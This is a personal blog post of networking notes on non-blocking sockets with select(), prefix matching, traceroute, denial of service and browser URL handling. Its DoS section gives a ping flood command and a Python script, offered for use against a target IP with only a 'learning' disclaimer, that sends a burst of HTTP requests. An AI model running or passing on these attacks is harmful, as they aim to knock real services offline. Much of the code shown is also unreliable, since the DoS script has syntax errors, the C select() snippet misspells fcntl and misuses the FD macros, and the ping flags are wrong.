Wednesday, 17 May 2017

Networking

 non-blocking connect() in Linux

The select() function shall examine the file descriptor sets whose addresses are passed in the readfds, writefds, and errorfds parameters to see whether some of their descriptors are ready for reading, are ready for writing.

 - create socket using socket(),
-  set the file descriptor to non-blocking mode using fcntl(2)
fnctl (fd, SETFL, fcntl(fd, GETFL) | O_NONBLOCK)

- connect() to the socket.
 

After Socket connected, Checking the Descriptors for ready continuously in tight loop is not good solution. So, We need to use the Select() function call to verify any FD is ready to use.

/* No loop required */
fd_set write_set;
FD_ZERO(write_set);
FD_SET(write_set, fd);
select (fd+1, 0, write_set, 0, 0);

File descriptor masks of type fd_set can be initialized and tested with FD_CLR(), FD_ISSET(), FD_SET(), and

FD_SET(fd, fdsetp) shall add the file descriptor fd to the set pointed to by fdsetp. If the file descriptor fd is already in this set, there shall be no effect on the set, nor will an error be returned.
FD_ZERO(fdsetp) shall initialize the descriptor set pointed to by fdsetp to the null set. No error is returned if the set is not empty at the time FD_ZERO() is invoked.



Longest Prefix Matching
 all packets in overlapping range (192.24.12.0 to 192.24.15.255) are forwarded to next hop B as B has longer prefix (22 bits).



What is traceroute?
Traceroute is a widely used command line utility available in almost all operating systems. It shows you the complete route to a destination address. It also shows the time taken (or delays) between intermediate routers. Isn’t it great? Below is an example on Windows operating System.
tracert

Deniel of Service and Prevention

Denial of Service (DoS) is a cyber-attack on an individual Computer or Website with intent to deny services to intended users.

The most famous DoS technique is Ping of Death. The Ping of Death attack works by generating and sending special network messages (specifically, ICMP packets of non-standard sizes) that cause problems for systems that receive them.

 

Following is the command for performing flooding of request on an IP
ping ip_address –t -65500
  • “-t” means the data packets should be sent until the program is stopped.
  • “-l(65500)” specifies the data load to be sent to the victim.

 

Following is the python script for performing denial of service attack
# Please note that running this code might
# cause your IP blocked by server. And purpose
# of this code is only learning.
import socket, sys, os 
print "][ Attacking " + sys.argv[1+ " ... ][" 
print "injecting " + sys.argv[2]; 
def attack(): 
    #pid = os.fork() 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
    s.connect((sys.argv[1], 80)) 
    print ">> GET /" + sys.argv[2] + " HTTP/1.1" 
    s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n"
    s.send("Host: " + sys.argv[1+ "\r\n\r\n"); 
    s.close() 
# Driver code
for i in range(1, 1000): 
    attack()

 

We can use above code as
python ddos.py target_ip_address apache

 Prevention

  • Firewall – This is the simplest and least effective method. Generally someone writes some Python scripts that try to filter out the bad traffic or an enterprise will try and use its existing firewalls to block the traffic.

 To safeguard from these attack you have to apply secure coding and design strong architecture which can prevent these kind of attacks and update day-to-day solution to bug of your website.

 

What happens when you type a URL in web browser?
A URL may contain request to HTML, image file or any other type.
  1. If content of the typed URL is in cache and fresh, then display the content.
  2. Else find IP address for the domain so that a TCP connection can be setup. Browser does a DNS lookup.
  3. Browser needs to know IP address for a url, so that it can setup a TCP connection.  This is why browser needs DNS service.  Browser first looks for URL-IP mapping browser cache, then in OS cache. If all caches are empty, then it makes a recursive query to the local DNS server.   The local DNS server provides the IP address.
  4. Browser sets up a TCP connection using three way handshake.
  5. Browser sends a HTTP request.
  6. Server has a web server like Apache, IIS running that handles incoming HTTP request and sends a HTTP response.
  7. Browser receives the HTTP response and renders the content. 

No comments:

Post a Comment